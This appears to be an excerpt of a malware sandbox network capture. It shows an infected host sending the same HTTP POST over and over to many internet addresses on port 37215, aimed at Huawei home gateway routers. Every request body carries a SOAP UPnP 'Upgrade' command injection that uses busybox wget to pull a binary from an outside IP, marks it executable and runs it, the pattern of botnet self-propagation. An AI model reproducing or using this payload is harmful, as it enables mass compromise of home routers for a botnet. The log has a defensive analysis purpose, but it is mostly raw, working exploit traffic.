                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              208192.168.2.1547224222.79.189.12237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038880110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              209192.168.2.1555146186.141.93.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038928032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              210192.168.2.153290445.49.61.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038928986 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              211192.168.2.1554746138.51.92.11937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038937092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              212192.168.2.1548752121.92.174.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039014101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              213192.168.2.1546598181.108.59.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039020061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              214192.168.2.153779837.187.201.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039020061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              215192.168.2.1547978222.39.182.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039038897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              216192.168.2.1533280102.5.99.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039072037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              217192.168.2.154766694.110.142.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039077044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              218192.168.2.1547108138.43.45.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039163113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
